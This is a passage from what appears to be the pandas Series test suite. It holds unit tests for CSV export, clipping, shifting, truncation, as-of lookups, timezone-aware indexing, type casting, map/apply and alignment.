parse_dates=False)\n checkseries = Series({'1998-01-01': 1.0, '1999-01-01': 2.0})\n assert_series_equal(checkseries, series)\n\n def test_to_csv(self):\n import io\n\n with ensure_clean() as path:\n self.ts.to_csv(path)\n\n lines = io.open(path, newline=None).readlines()\n assert(lines[1] != '\\n')\n\n self.ts.to_csv(path, index=False)\n arr = np.loadtxt(path)\n assert_almost_equal(arr, self.ts.values)\n\n def test_to_csv_unicode_index(self):\n buf = StringIO()\n s = Series([u(\"\\u05d0\"), \"d2\"], index=[u(\"\\u05d0\"), u(\"\\u05d1\")])\n\n s.to_csv(buf, encoding='UTF-8')\n buf.seek(0)\n\n s2 = Series.from_csv(buf, index_col=0, encoding='UTF-8')\n\n assert_series_equal(s, s2)\n\n def test_tolist(self):\n rs = self.ts.tolist()\n xp = self.ts.values.tolist()\n assert_almost_equal(rs, xp)\n\n # datetime64\n s = Series(self.ts.index)\n rs = s.tolist()\n self.assertEqual(self.ts.index[0], rs[0])\n\n def test_to_frame(self):\n self.ts.name = None\n rs = self.ts.to_frame()\n xp = pd.DataFrame(self.ts.values, index=self.ts.index)\n assert_frame_equal(rs, xp)\n\n self.ts.name = 'testname'\n rs = self.ts.to_frame()\n xp = pd.DataFrame(dict(testname=self.ts.values), index=self.ts.index)\n assert_frame_equal(rs, xp)\n\n rs = self.ts.to_frame(name='testdifferent')\n xp = pd.DataFrame(dict(testdifferent=self.ts.values), index=self.ts.index)\n assert_frame_equal(rs, xp)\n\n def test_to_dict(self):\n self.assert_numpy_array_equal(Series(self.ts.to_dict()), self.ts)\n\n def test_to_csv_float_format(self):\n\n with ensure_clean() as filename:\n ser = Series([0.123456, 0.234567, 0.567567])\n ser.to_csv(filename, float_format='%.2f')\n\n rs = Series.from_csv(filename)\n xp = Series([0.12, 0.23, 0.57])\n assert_series_equal(rs, xp)\n\n def test_to_csv_list_entries(self):\n s = Series(['jack and jill', 'jesse and frank'])\n\n split = s.str.split(r'\\s+and\\s+')\n\n buf = StringIO()\n split.to_csv(buf)\n\n def test_to_csv_path_is_none(self):\n # GH 8215\n # Series.to_csv() was returning None, inconsistent with\n # DataFrame.to_csv() which returned string\n s = Series([1, 2, 3])\n csv_str = s.to_csv(path=None)\n self.assertIsInstance(csv_str, str)\n\n def test_clip(self):\n val = self.ts.median()\n\n self.assertEqual(self.ts.clip_lower(val).min(), val)\n self.assertEqual(self.ts.clip_upper(val).max(), val)\n\n self.assertEqual(self.ts.clip(lower=val).min(), val)\n self.assertEqual(self.ts.clip(upper=val).max(), val)\n\n result = self.ts.clip(-0.5, 0.5)\n expected = np.clip(self.ts, -0.5, 0.5)\n assert_series_equal(result, expected)\n tm.assert_isinstance(expected, Series)\n\n def test_clip_types_and_nulls(self):\n\n sers = [Series([np.nan, 1.0, 2.0, 3.0]),\n Series([None, 'a', 'b', 'c']),\n Series(pd.to_datetime([np.nan, 1, 2, 3], unit='D'))]\n\n for s in sers:\n thresh = s[2]\n l = s.clip_lower(thresh)\n u = s.clip_upper(thresh)\n self.assertEqual(l[notnull(l)].min(), thresh)\n self.assertEqual(u[notnull(u)].max(), thresh)\n self.assertEqual(list(isnull(s)), list(isnull(l)))\n self.assertEqual(list(isnull(s)), list(isnull(u)))\n\n def test_valid(self):\n ts = self.ts.copy()\n ts[::2] = np.NaN\n\n result = ts.valid()\n self.assertEqual(len(result), ts.count())\n\n tm.assert_dict_equal(result, ts, compare_keys=False)\n\n def test_isnull(self):\n ser = Series([0, 5.4, 3, nan, -0.001])\n np.array_equal(\n ser.isnull(), Series([False, False, False, True, False]).values)\n ser = Series([\"hi\", \"\", nan])\n np.array_equal(ser.isnull(), Series([False, False, True]).values)\n\n def test_notnull(self):\n ser = Series([0, 5.4, 3, nan, -0.001])\n np.array_equal(\n ser.notnull(), Series([True, True, True, False, True]).values)\n ser = Series([\"hi\", \"\", nan])\n np.array_equal(ser.notnull(), Series([True, True, False]).values)\n\n def test_shift(self):\n shifted = self.ts.shift(1)\n unshifted = shifted.shift(-1)\n\n tm.assert_dict_equal(unshifted.valid(), self.ts, compare_keys=False)\n\n offset = datetools.bday\n shifted = self.ts.shift(1, freq=offset)\n unshifted = shifted.shift(-1, freq=offset)\n\n assert_series_equal(unshifted, self.ts)\n\n unshifted = self.ts.shift(0, freq=offset)\n assert_series_equal(unshifted, self.ts)\n\n shifted = self.ts.shift(1, freq='B')\n unshifted = shifted.shift(-1, freq='B')\n\n assert_series_equal(unshifted, self.ts)\n\n # corner case\n unshifted = self.ts.shift(0)\n assert_series_equal(unshifted, self.ts)\n\n # Shifting with PeriodIndex\n ps = tm.makePeriodSeries()\n shifted = ps.shift(1)\n unshifted = shifted.shift(-1)\n tm.assert_dict_equal(unshifted.valid(), ps, compare_keys=False)\n\n shifted2 = ps.shift(1, 'B')\n shifted3 = ps.shift(1, datetools.bday)\n assert_series_equal(shifted2, shifted3)\n assert_series_equal(ps, shifted2.shift(-1, 'B'))\n\n self.assertRaises(ValueError, ps.shift, freq='D')\n\n # legacy support\n shifted4 = ps.shift(1, timeRule='B')\n assert_series_equal(shifted2, shifted4)\n\n shifted5 = ps.shift(1, offset=datetools.bday)\n assert_series_equal(shifted5, shifted4)\n\n # 32-bit taking\n # GH 8129\n index=date_range('2000-01-01',periods=5)\n for dtype in ['int32','int64']:\n s1 = Series(np.arange(5,dtype=dtype),index=index)\n p = s1.iloc[1]\n result = s1.shift(periods=p)\n expected = Series([np.nan,0,1,2,3],index=index)\n assert_series_equal(result,expected)\n\n def test_tshift(self):\n # PeriodIndex\n ps = tm.makePeriodSeries()\n shifted = ps.tshift(1)\n unshifted = shifted.tshift(-1)\n\n assert_series_equal(unshifted, ps)\n\n shifted2 = ps.tshift(freq='B')\n assert_series_equal(shifted, shifted2)\n\n shifted3 = ps.tshift(freq=datetools.bday)\n assert_series_equal(shifted, shifted3)\n\n self.assertRaises(ValueError, ps.tshift, freq='M')\n\n # DatetimeIndex\n shifted = self.ts.tshift(1)\n unshifted = shifted.tshift(-1)\n\n assert_series_equal(self.ts, unshifted)\n\n shifted2 = self.ts.tshift(freq=self.ts.index.freq)\n assert_series_equal(shifted, shifted2)\n\n inferred_ts = Series(self.ts.values, Index(np.asarray(self.ts.index)))\n shifted = inferred_ts.tshift(1)\n unshifted = shifted.tshift(-1)\n assert_series_equal(shifted, self.ts.tshift(1))\n assert_series_equal(unshifted, inferred_ts)\n\n no_freq = self.ts[[0, 5, 7]]\n self.assertRaises(ValueError, no_freq.tshift)\n\n def test_shift_int(self):\n ts = self.ts.astype(int)\n shifted = ts.shift(1)\n expected = ts.astype(float).shift(1)\n assert_series_equal(shifted, expected)\n\n def test_truncate(self):\n offset = datetools.bday\n\n ts = self.ts[::3]\n\n start, end = self.ts.index[3], self.ts.index[6]\n start_missing, end_missing = self.ts.index[2], self.ts.index[7]\n\n # neither specified\n truncated = ts.truncate()\n assert_series_equal(truncated, ts)\n\n # both specified\n expected = ts[1:3]\n\n truncated = ts.truncate(start, end)\n assert_series_equal(truncated, expected)\n\n truncated = ts.truncate(start_missing, end_missing)\n assert_series_equal(truncated, expected)\n\n # start specified\n expected = ts[1:]\n\n truncated = ts.truncate(before=start)\n assert_series_equal(truncated, expected)\n\n truncated = ts.truncate(before=start_missing)\n assert_series_equal(truncated, expected)\n\n # end specified\n expected = ts[:3]\n\n truncated = ts.truncate(after=end)\n assert_series_equal(truncated, expected)\n\n truncated = ts.truncate(after=end_missing)\n assert_series_equal(truncated, expected)\n\n # corner case, empty series returned\n truncated = ts.truncate(after=self.ts.index[0] - offset)\n assert(len(truncated) == 0)\n\n truncated = ts.truncate(before=self.ts.index[-1] + offset)\n assert(len(truncated) == 0)\n\n self.assertRaises(ValueError, ts.truncate,\n before=self.ts.index[-1] + offset,\n after=self.ts.index[0] - offset)\n\n def test_ptp(self):\n N = 1000\n arr = np.random.randn(N)\n ser = Series(arr)\n self.assertEqual(np.ptp(ser), np.ptp(arr))\n\n def test_asof(self):\n # array or list or dates\n N = 50\n rng = date_range('1/1/1990', periods=N, freq='53s')\n ts = Series(np.random.randn(N), index=rng)\n ts[15:30] = np.nan\n dates = date_range('1/1/1990', periods=N * 3, freq='25s')\n\n result = ts.asof(dates)\n self.assertTrue(notnull(result).all())\n lb = ts.index[14]\n ub = ts.index[30]\n\n result = ts.asof(list(dates))\n self.assertTrue(notnull(result).all())\n lb = ts.index[14]\n ub = ts.index[30]\n\n mask = (result.index >= lb) & (result.index < ub)\n rs = result[mask]\n self.assertTrue((rs == ts[lb]).all())\n\n val = result[result.index[result.index >= ub][0]]\n self.assertEqual(ts[ub], val)\n\n self.ts[5:10] = np.NaN\n self.ts[15:20] = np.NaN\n\n val1 = self.ts.asof(self.ts.index[7])\n val2 = self.ts.asof(self.ts.index[19])\n\n self.assertEqual(val1, self.ts[4])\n self.assertEqual(val2, self.ts[14])\n\n # accepts strings\n val1 = self.ts.asof(str(self.ts.index[7]))\n self.assertEqual(val1, self.ts[4])\n\n # in there\n self.assertEqual(self.ts.asof(self.ts.index[3]), self.ts[3])\n\n # no as of value\n d = self.ts.index[0] - datetools.bday\n self.assertTrue(np.isnan(self.ts.asof(d)))\n\n def test_getitem_setitem_datetimeindex(self):\n from pandas import date_range\n N = 50\n # testing with timezone, GH #2785\n rng = date_range('1/1/1990', periods=N, freq='H', tz='US/Eastern')\n ts = Series(np.random.randn(N), index=rng)\n\n result = ts[\"1990-01-01 04:00:00\"]\n expected = ts[4]\n self.assertEqual(result, expected)\n\n result = ts.copy()\n result[\"1990-01-01 04:00:00\"] = 0\n result[\"1990-01-01 04:00:00\"] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts[\"1990-01-01 04:00:00\":\"1990-01-01 07:00:00\"]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n result = ts.copy()\n result[\"1990-01-01 04:00:00\":\"1990-01-01 07:00:00\"] = 0\n result[\"1990-01-01 04:00:00\":\"1990-01-01 07:00:00\"] = ts[4:8]\n assert_series_equal(result, ts)\n\n lb = \"1990-01-01 04:00:00\"\n rb = \"1990-01-01 07:00:00\"\n result = ts[(ts.index >= lb) & (ts.index <= rb)]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n # repeat all the above with naive datetimes\n result = ts[datetime(1990, 1, 1, 4)]\n expected = ts[4]\n self.assertEqual(result, expected)\n\n result = ts.copy()\n result[datetime(1990, 1, 1, 4)] = 0\n result[datetime(1990, 1, 1, 4)] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts[datetime(1990, 1, 1, 4):datetime(1990, 1, 1, 7)]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n result = ts.copy()\n result[datetime(1990, 1, 1, 4):datetime(1990, 1, 1, 7)] = 0\n result[datetime(1990, 1, 1, 4):datetime(1990, 1, 1, 7)] = ts[4:8]\n assert_series_equal(result, ts)\n\n lb = datetime(1990, 1, 1, 4)\n rb = datetime(1990, 1, 1, 7)\n result = ts[(ts.index >= lb) & (ts.index <= rb)]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n result = ts[ts.index[4]]\n expected = ts[4]\n self.assertEqual(result, expected)\n\n result = ts[ts.index[4:8]]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n result = ts.copy()\n result[ts.index[4:8]] = 0\n result[4:8] = ts[4:8]\n assert_series_equal(result, ts)\n\n # also test partial date slicing\n result = ts[\"1990-01-02\"]\n expected = ts[24:48]\n assert_series_equal(result, expected)\n\n result = ts.copy()\n result[\"1990-01-02\"] = 0\n result[\"1990-01-02\"] = ts[24:48]\n assert_series_equal(result, ts)\n\n def test_getitem_setitem_datetime_tz_pytz(self):\n tm._skip_if_no_pytz();\n from pytz import timezone as tz\n\n from pandas import date_range\n N = 50\n # testing with timezone, GH #2785\n rng = date_range('1/1/1990', periods=N, freq='H', tz='US/Eastern')\n ts = Series(np.random.randn(N), index=rng)\n\n # also test Timestamp tz handling, GH #2789\n result = ts.copy()\n result[\"1990-01-01 09:00:00+00:00\"] = 0\n result[\"1990-01-01 09:00:00+00:00\"] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts.copy()\n result[\"1990-01-01 03:00:00-06:00\"] = 0\n result[\"1990-01-01 03:00:00-06:00\"] = ts[4]\n assert_series_equal(result, ts)\n\n # repeat with datetimes\n result = ts.copy()\n result[datetime(1990, 1, 1, 9, tzinfo=tz('UTC'))] = 0\n result[datetime(1990, 1, 1, 9, tzinfo=tz('UTC'))] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts.copy()\n\n # comparison dates with datetime MUST be localized!\n date = tz('US/Central').localize(datetime(1990, 1, 1, 3))\n result[date] = 0\n result[date] = ts[4]\n assert_series_equal(result, ts)\n\n\n def test_getitem_setitem_datetime_tz_dateutil(self):\n tm._skip_if_no_dateutil();\n from dateutil.tz import tzutc\n from dateutil.zoneinfo import gettz\n tz = lambda x: tzutc() if x == 'UTC' else gettz(x) # handle special case for utc in dateutil\n\n from pandas import date_range\n N = 50\n # testing with timezone, GH #2785\n rng = date_range('1/1/1990', periods=N, freq='H', tz='US/Eastern')\n ts = Series(np.random.randn(N), index=rng)\n\n # also test Timestamp tz handling, GH #2789\n result = ts.copy()\n result[\"1990-01-01 09:00:00+00:00\"] = 0\n result[\"1990-01-01 09:00:00+00:00\"] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts.copy()\n result[\"1990-01-01 03:00:00-06:00\"] = 0\n result[\"1990-01-01 03:00:00-06:00\"] = ts[4]\n assert_series_equal(result, ts)\n\n # repeat with datetimes\n result = ts.copy()\n result[datetime(1990, 1, 1, 9, tzinfo=tz('UTC'))] = 0\n result[datetime(1990, 1, 1, 9, tzinfo=tz('UTC'))] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts.copy()\n result[datetime(1990, 1, 1, 3, tzinfo=tz('US/Central'))] = 0\n result[datetime(1990, 1, 1, 3, tzinfo=tz('US/Central'))] = ts[4]\n assert_series_equal(result, ts)\n\n def test_getitem_setitem_periodindex(self):\n from pandas import period_range\n N = 50\n rng = period_range('1/1/1990', periods=N, freq='H')\n ts = Series(np.random.randn(N), index=rng)\n\n result = ts[\"1990-01-01 04\"]\n expected = ts[4]\n self.assertEqual(result, expected)\n\n result = ts.copy()\n result[\"1990-01-01 04\"] = 0\n result[\"1990-01-01 04\"] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts[\"1990-01-01 04\":\"1990-01-01 07\"]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n result = ts.copy()\n result[\"1990-01-01 04\":\"1990-01-01 07\"] = 0\n result[\"1990-01-01 04\":\"1990-01-01 07\"] = ts[4:8]\n assert_series_equal(result, ts)\n\n lb = \"1990-01-01 04\"\n rb = \"1990-01-01 07\"\n result = ts[(ts.index >= lb) & (ts.index <= rb)]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n # GH 2782\n result = ts[ts.index[4]]\n expected = ts[4]\n self.assertEqual(result, expected)\n\n result = ts[ts.index[4:8]]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n result = ts.copy()\n result[ts.index[4:8]] = 0\n result[4:8] = ts[4:8]\n assert_series_equal(result, ts)\n\n def test_asof_periodindex(self):\n from pandas import period_range, PeriodIndex\n # array or list or dates\n N = 50\n rng = period_range('1/1/1990', periods=N, freq='H')\n ts = Series(np.random.randn(N), index=rng)\n ts[15:30] = np.nan\n dates = date_range('1/1/1990', periods=N * 3, freq='37min')\n\n result = ts.asof(dates)\n self.assertTrue(notnull(result).all())\n lb = ts.index[14]\n ub = ts.index[30]\n\n result = ts.asof(list(dates))\n self.assertTrue(notnull(result).all())\n lb = ts.index[14]\n ub = ts.index[30]\n\n pix = PeriodIndex(result.index.values, freq='H')\n mask = (pix >= lb) & (pix < ub)\n rs = result[mask]\n self.assertTrue((rs == ts[lb]).all())\n\n ts[5:10] = np.NaN\n ts[15:20] = np.NaN\n\n val1 = ts.asof(ts.index[7])\n val2 = ts.asof(ts.index[19])\n\n self.assertEqual(val1, ts[4])\n self.assertEqual(val2, ts[14])\n\n # accepts strings\n val1 = ts.asof(str(ts.index[7]))\n self.assertEqual(val1, ts[4])\n\n # in there\n self.assertEqual(ts.asof(ts.index[3]), ts[3])\n\n # no as of value\n d = ts.index[0].to_timestamp() - datetools.bday\n self.assertTrue(np.isnan(ts.asof(d)))\n\n def test_asof_more(self):\n from pandas import date_range\n s = Series([nan, nan, 1, 2, nan, nan, 3, 4, 5],\n index=date_range('1/1/2000', periods=9))\n\n dates = s.index[[4, 5, 6, 2, 1]]\n\n result = s.asof(dates)\n expected = Series([2, 2, 3, 1, np.nan], index=dates)\n\n assert_series_equal(result, expected)\n\n s = Series([1.5, 2.5, 1, 2, nan, nan, 3, 4, 5],\n index=date_range('1/1/2000', periods=9))\n result = s.asof(s.index[0])\n self.assertEqual(result, s[0])\n\n def test_cast_on_putmask(self):\n\n # GH 2746\n\n # need to upcast\n s = Series([1, 2], index=[1, 2], dtype='int64')\n s[[True, False]] = Series([0], index=[1], dtype='int64')\n expected = Series([0, 2], index=[1, 2], dtype='int64')\n\n assert_series_equal(s, expected)\n\n def test_type_promote_putmask(self):\n\n # GH8387: test that changing types does not break alignment\n ts = Series(np.random.randn(100), index=np.arange(100,0,-1)).round(5)\n left, mask = ts.copy(), ts > 0\n right = ts[mask].copy().map(str)\n left[mask] = right\n assert_series_equal(left, ts.map(lambda t: str(t) if t > 0 else t))\n\n s = Series([0, 1, 2, 0 ])\n mask = s > 0\n s2 = s[ mask ].map( str )\n s[mask] = s2\n assert_series_equal(s, Series([0, '1', '2', 0]))\n\n s = Series([0, 'foo', 'bar', 0 ])\n mask = Series([False, True, True, False])\n s2 = s[ mask ]\n s[mask] = s2\n assert_series_equal(s, Series([0, 'foo','bar', 0]))\n\n def test_astype_cast_nan_int(self):\n df = Series([1.0, 2.0, 3.0, np.nan])\n self.assertRaises(ValueError, df.astype, np.int64)\n\n def test_astype_cast_object_int(self):\n arr = Series([\"car\", \"house\", \"tree\", \"1\"])\n\n self.assertRaises(ValueError, arr.astype, int)\n self.assertRaises(ValueError, arr.astype, np.int64)\n self.assertRaises(ValueError, arr.astype, np.int8)\n\n arr = Series(['1', '2', '3', '4'], dtype=object)\n result = arr.astype(int)\n self.assert_numpy_array_equal(result, np.arange(1, 5))\n\n def test_astype_datetimes(self):\n import pandas.tslib as tslib\n\n s = Series(tslib.iNaT, dtype='M8[ns]', index=lrange(5))\n s = s.astype('O')\n self.assertEqual(s.dtype, np.object_)\n\n s = Series([datetime(2001, 1, 2, 0, 0)])\n s = s.astype('O')\n self.assertEqual(s.dtype, np.object_)\n\n s = Series([datetime(2001, 1, 2, 0, 0) for i in range(3)])\n s[1] = np.nan\n self.assertEqual(s.dtype, 'M8[ns]')\n s = s.astype('O')\n self.assertEqual(s.dtype, np.object_)\n\n def test_astype_str(self):\n # GH4405\n digits = string.digits\n s1 = Series([digits * 10, tm.rands(63), tm.rands(64),\n tm.rands(1000)])\n s2 = Series([digits * 10, tm.rands(63), tm.rands(64), nan, 1.0])\n types = (compat.text_type, np.str_)\n for typ in types:\n for s in (s1, s2):\n res = s.astype(typ)\n expec = s.map(compat.text_type)\n assert_series_equal(res, expec)\n\n def test_astype_unicode(self):\n\n # GH7758\n # a bit of magic is required to set default encoding encoding to utf-8\n digits = string.digits\n test_series = [\n Series([digits * 10, tm.rands(63), tm.rands(64), tm.rands(1000)]),\n Series([u('データーサイエンス、お前はもう死んでいる')]),\n\n ]\n\n former_encoding = None\n if not compat.PY3:\n # in python we can force the default encoding\n # for this test\n former_encoding = sys.getdefaultencoding()\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n if sys.getdefaultencoding() == \"utf-8\":\n test_series.append(Series([u('野菜食べないとやばい').encode(\"utf-8\")]))\n for s in test_series:\n res = s.astype(\"unicode\")\n expec = s.map(compat.text_type)\n assert_series_equal(res, expec)\n # restore the former encoding\n if former_encoding is not None and former_encoding != \"utf-8\":\n reload(sys)\n sys.setdefaultencoding(former_encoding)\n\n\n def test_map(self):\n index, data = tm.getMixedTypeDict()\n\n source = Series(data['B'], index=data['C'])\n target = Series(data['C'][:4], index=data['D'][:4])\n\n merged = target.map(source)\n\n for k, v in compat.iteritems(merged):\n self.assertEqual(v, source[target[k]])\n\n # input could be a dict\n merged = target.map(source.to_dict())\n\n for k, v in compat.iteritems(merged):\n self.assertEqual(v, source[target[k]])\n\n # function\n result = self.ts.map(lambda x: x * 2)\n self.assert_numpy_array_equal(result, self.ts * 2)\n\n def test_map_compat(self):\n # related GH 8024\n s = Series([True,True,False],index=[1,2,3])\n result = s.map({ True : 'foo', False : 'bar' })\n expected = Series(['foo','foo','bar'],index=[1,2,3])\n assert_series_equal(result,expected)\n\n def test_map_int(self):\n left = Series({'a': 1., 'b': 2., 'c': 3., 'd': 4})\n right = Series({1: 11, 2: 22, 3: 33})\n\n self.assertEqual(left.dtype, np.float_)\n self.assertTrue(issubclass(right.dtype.type, np.integer))\n\n merged = left.map(right)\n self.assertEqual(merged.dtype, np.float_)\n self.assertTrue(isnull(merged['d']))\n self.assertTrue(not isnull(merged['c']))\n\n def test_map_type_inference(self):\n s = Series(lrange(3))\n s2 = s.map(lambda x: np.where(x == 0, 0, 1))\n self.assertTrue(issubclass(s2.dtype.type, np.integer))\n\n def test_map_decimal(self):\n from decimal import Decimal\n\n result = self.series.map(lambda x: Decimal(str(x)))\n self.assertEqual(result.dtype, np.object_)\n tm.assert_isinstance(result[0], Decimal)\n\n def test_map_na_exclusion(self):\n s = Series([1.5, np.nan, 3, np.nan, 5])\n\n result = s.map(lambda x: x * 2, na_action='ignore')\n exp = s * 2\n assert_series_equal(result, exp)\n\n def test_map_dict_with_tuple_keys(self):\n '''\n Due to new MultiIndex-ing behaviour in v0.14.0,\n dicts with tuple keys passed to map were being\n converted to a multi-index, preventing tuple values\n from being mapped properly.\n '''\n df = pd.DataFrame({'a': [(1,), (2,), (3, 4), (5, 6)]})\n label_mappings = {\n (1,): 'A',\n (2,): 'B',\n (3, 4): 'A',\n (5, 6): 'B'\n }\n df['labels'] = df['a'].map(label_mappings)\n df['expected_labels'] = pd.Series(['A', 'B', 'A', 'B'], index=df.index)\n # All labels should be filled now\n tm.assert_series_equal(df['labels'], df['expected_labels'])\n\n def test_apply(self):\n assert_series_equal(self.ts.apply(np.sqrt), np.sqrt(self.ts))\n\n # elementwise-apply\n import math\n assert_series_equal(self.ts.apply(math.exp), np.exp(self.ts))\n\n # how to handle Series result, #2316\n result = self.ts.apply(lambda x: Series([x, x ** 2],\n index=['x', 'x^2']))\n expected = DataFrame({'x': self.ts, 'x^2': self.ts ** 2})\n tm.assert_frame_equal(result, expected)\n\n # empty series\n s = Series(dtype=object, name='foo', index=pd.Index([], name='bar'))\n rs = s.apply(lambda x: x)\n tm.assert_series_equal(s, rs)\n # check all metadata (GH 9322)\n self.assertIsNot(s, rs)\n self.assertIs(s.index, rs.index)\n self.assertEqual(s.dtype, rs.dtype)\n self.assertEqual(s.name, rs.name)\n\n # index but no data\n s = Series(index=[1, 2, 3])\n rs = s.apply(lambda x: x)\n tm.assert_series_equal(s, rs)\n\n def test_apply_same_length_inference_bug(self):\n s = Series([1, 2])\n f = lambda x: (x, x + 1)\n\n result = s.apply(f)\n expected = s.map(f)\n assert_series_equal(result, expected)\n\n s = Series([1, 2, 3])\n result = s.apply(f)\n expected = s.map(f)\n assert_series_equal(result, expected)\n\n def test_apply_dont_convert_dtype(self):\n s = Series(np.random.randn(10))\n\n f = lambda x: x if x > 0 else np.nan\n result = s.apply(f, convert_dtype=False)\n self.assertEqual(result.dtype, object)\n\n def test_convert_objects(self):\n\n s = Series([1., 2, 3], index=['a', 'b', 'c'])\n result = s.convert_objects(convert_dates=False, convert_numeric=True)\n assert_series_equal(result, s)\n\n # force numeric conversion\n r = s.copy().astype('O')\n r['a'] = '1'\n result = r.convert_objects(convert_dates=False, convert_numeric=True)\n assert_series_equal(result, s)\n\n r = s.copy().astype('O')\n r['a'] = '1.'\n result = r.convert_objects(convert_dates=False, convert_numeric=True)\n assert_series_equal(result, s)\n\n r = s.copy().astype('O')\n r['a'] = 'garbled'\n expected = s.copy()\n expected['a'] = np.nan\n result = r.convert_objects(convert_dates=False, convert_numeric=True)\n assert_series_equal(result, expected)\n\n # GH 4119, not converting a mixed type (e.g.floats and object)\n s = Series([1, 'na', 3, 4])\n result = s.convert_objects(convert_numeric=True)\n expected = Series([1, np.nan, 3, 4])\n assert_series_equal(result, expected)\n\n s = Series([1, '', 3, 4])\n result = s.convert_objects(convert_numeric=True)\n expected = Series([1, np.nan, 3, 4])\n assert_series_equal(result, expected)\n\n # dates\n s = Series(\n [datetime(2001, 1, 1, 0, 0), datetime(2001, 1, 2, 0, 0), datetime(2001, 1, 3, 0, 0)])\n s2 = Series([datetime(2001, 1, 1, 0, 0), datetime(2001, 1, 2, 0, 0), datetime(\n 2001, 1, 3, 0, 0), 'foo', 1.0, 1, Timestamp('20010104'), '20010105'], dtype='O')\n\n result = s.convert_objects(convert_dates=True, convert_numeric=False)\n expected = Series(\n [Timestamp('20010101'), Timestamp('20010102'), Timestamp('20010103')], dtype='M8[ns]')\n assert_series_equal(result, expected)\n\n result = s.convert_objects(\n convert_dates='coerce', convert_numeric=False)\n result = s.convert_objects(\n convert_dates='coerce', convert_numeric=True)\n assert_series_equal(result, expected)\n\n expected = Series(\n [Timestamp(\n '20010101'), Timestamp('20010102'), Timestamp('20010103'),\n lib.NaT, lib.NaT, lib.NaT, Timestamp('20010104'), Timestamp('20010105')], dtype='M8[ns]')\n result = s2.convert_objects(\n convert_dates='coerce', convert_numeric=False)\n assert_series_equal(result, expected)\n result = s2.convert_objects(\n convert_dates='coerce', convert_numeric=True)\n assert_series_equal(result, expected)\n\n # preserver all-nans (if convert_dates='coerce')\n s = Series(['foo', 'bar', 1, 1.0], dtype='O')\n result = s.convert_objects(\n convert_dates='coerce', convert_numeric=False)\n assert_series_equal(result, s)\n\n # preserver if non-object\n s = Series([1], dtype='float32')\n result = s.convert_objects(\n convert_dates='coerce', convert_numeric=False)\n assert_series_equal(result, s)\n\n #r = s.copy()\n #r[0] = np.nan\n #result = r.convert_objects(convert_dates=True,convert_numeric=False)\n #self.assertEqual(result.dtype, 'M8[ns]')\n\n # dateutil parses some single letters into today's value as a date\n for x in 'abcdefghijklmnopqrstuvwxyz':\n s = Series([x])\n result = s.convert_objects(convert_dates='coerce')\n assert_series_equal(result, s)\n s = Series([x.upper()])\n result = s.convert_objects(convert_dates='coerce')\n assert_series_equal(result, s)\n\n def test_convert_objects_preserve_bool(self):\n s = Series([1, True, 3, 5], dtype=object)\n r = s.convert_objects(convert_numeric=True)\n e = Series([1, 1, 3, 5], dtype='i8')\n tm.assert_series_equal(r, e)\n\n def test_convert_objects_preserve_all_bool(self):\n s = Series([False, True, False, False], dtype=object)\n r = s.convert_objects(convert_numeric=True)\n e = Series([False, True, False, False], dtype=bool)\n tm.assert_series_equal(r, e)\n\n def test_apply_args(self):\n s = Series(['foo,bar'])\n\n result = s.apply(str.split, args=(',',))\n self.assertEqual(result[0], ['foo', 'bar'])\n tm.assert_isinstance(result[0], list)\n\n def test_align(self):\n def _check_align(a, b, how='left', fill=None):\n aa, ab = a.align(b, join=how, fill_value=fill)\n\n join_index = a.index.join(b.index, how=how)\n if fill is not None:\n diff_a = aa.index.difference(join_index)\n diff_b = ab.index.difference(join_index)\n if len(diff_a) > 0:\n self.assertTrue((aa.reindex(diff_a) == fill).all())\n if len(diff_b) > 0:\n self.assertTrue((ab.reindex(diff_b) == fill).all())\n\n ea = a.reindex(join_index)\n eb = b.reindex(join_index)\n\n if fill is not None:\n ea = ea.fillna(fill)\n eb = eb.fillna(fill)\n\n assert_series_equal(aa, ea)\n assert_series_equal(ab, eb)\n\n for kind in JOIN_TYPES:\n _check_align(self.ts[2:], self.ts[:-5], how=kind)\n _check_align(self.ts[2:], self.ts[:-5], how=kind, fill=-1)\n\n # empty left\n _check_align(self.ts[:0], self.ts[:-5], how=kind)\n\n # empty right\n _check_align(self.ts[:-5], self.ts[:0], how=kind)\n\n # both empty\n _check_align(self.ts[:0], self.ts[:0], how=kind)\n\n def test_align_fill_method(self):\n def _check_align(a, b, how='left', method='pad', limit=None):\n aa, ab = a.align(b, join=how, method=method, limit=limit)\n\n join_index = a.index.join(b.index, how=how)\n ea = a.reindex(join_index)\n eb = b.reindex(join_index)\n\n ea = ea.fillna(method=method, limit=limit)\n eb = eb.fillna(method=method, limit=limit)\n\n assert_series_equal(aa, ea)\n assert_series_equal(ab, eb)\n\n for kind in JOIN_TYPES:\n for meth in ['pad', 'bfill']:\n _check_align(self.ts[2:], self.ts[:-5], how=kind, method=meth)\n _check_align(self.ts[2:], self.ts[:-5], how=kind,\n method=meth, limit=1)\n\n # empty left\n _check_align(self.ts[:0], self.ts[:-5], how=kind, method=meth)\n _check_align(self.ts[:0], self.ts[:-5], how=kind, method=meth,\n limit=1)\n\n # empty right\n _check_align(self.ts[:-5], self.ts[:0], how=kind, method=meth)\n _check_align(self.ts[:-5], self.ts[:0], how=kind, method=meth,\n limit=1)\n\n # both empty\n _check_align(self.ts[:0], self.ts[:0], how=kind, method=meth)\n _check_align(self.ts[:0], self.ts[:0], how=kind, method=meth,\n limit=1)\n\n def test_align_nocopy(self):\n b = self.ts[:5].copy()\n\n # do copy\n a = self.ts.copy()\n ra, _ = a.align(b, join='left')\n ra[:5] = 5\n self.assertFalse((a[:5] == 5).any())\n\n # do not copy\n a = self.ts.copy()\n ra, _ = a.align(b, join='left', copy=False)\n ra[:5] = 5\n self.assertTrue((a[:5] == 5).all())\n\n # do copy\n a = self.ts.copy()\n b = self.ts[:5].copy()\n _, rb = a.align(b, 